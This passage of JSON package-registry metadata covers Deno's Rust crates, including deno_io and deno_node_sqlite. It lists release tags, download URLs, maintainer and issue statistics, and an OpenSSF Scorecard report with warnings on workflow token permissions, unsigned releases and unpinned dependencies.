noland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-24T13:09:43.631Z","dependent_packages_count":5,"downloads":516372,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":7.6117355086861656,"dependent_repos_count":13.215541873214192,"dependent_packages_count":9.161404508706934,"stargazers_count":0.0022493308240798364,"forks_count":0.0577328244847158,"docker_downloads_count":6.765146970605879,"average":6.135635169420328},"purl":"pkg:cargo/deno_io","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_io","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_io","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_io/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-23T15:40:54.265Z","issues_count":6598,"pull_requests_count":9606,"avg_time_to_close_issue":17246074.663934425,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3780,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2464,"avg_comments_per_issue":2.5110639587753867,"avg_comments_per_pull_request":0.7159067249635644,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":662,"past_year_pull_requests_count":1182,"past_year_avg_time_to_close_issue":1381266.2837209303,"past_year_avg_time_to_close_pull_request":1332181.7239747634,"past_year_issues_closed_count":215,"past_year_pull_requests_closed_count":634,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":371,"past_year_avg_comments_per_issue":1.20392749244713,"past_year_avg_comments_per_pull_request":1.0829103214890017,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":464,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1778,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":376,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_io/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-03-03T15:41:20.890Z","updated_at":"2023-03-03T15:41:20.890Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:30.199Z","updated_at":"2023-07-18T22:41:30.199Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13674639,"name":"deno_node_sqlite","ecosystem":"cargo","description":"Node sqlite compatibility for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":27,"first_release_published_at":"2026-02-12T15:06:13.179Z","latest_release_published_at":"2026-08-06T11:46:49.340Z","latest_release_number":"0.27.0","last_synced_at":"2026-08-29T21:57:29.127Z","created_at":"2026-02-12T15:17:52.072Z","updated_at":"2026-08-29T21:57:29.127Z","registry_url":"https://crates.io/crates/deno_node_sqlite/","install_command":"cargo install deno_node_sqlite","documentation_url":"https://docs.rs/deno_node_sqlite/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: 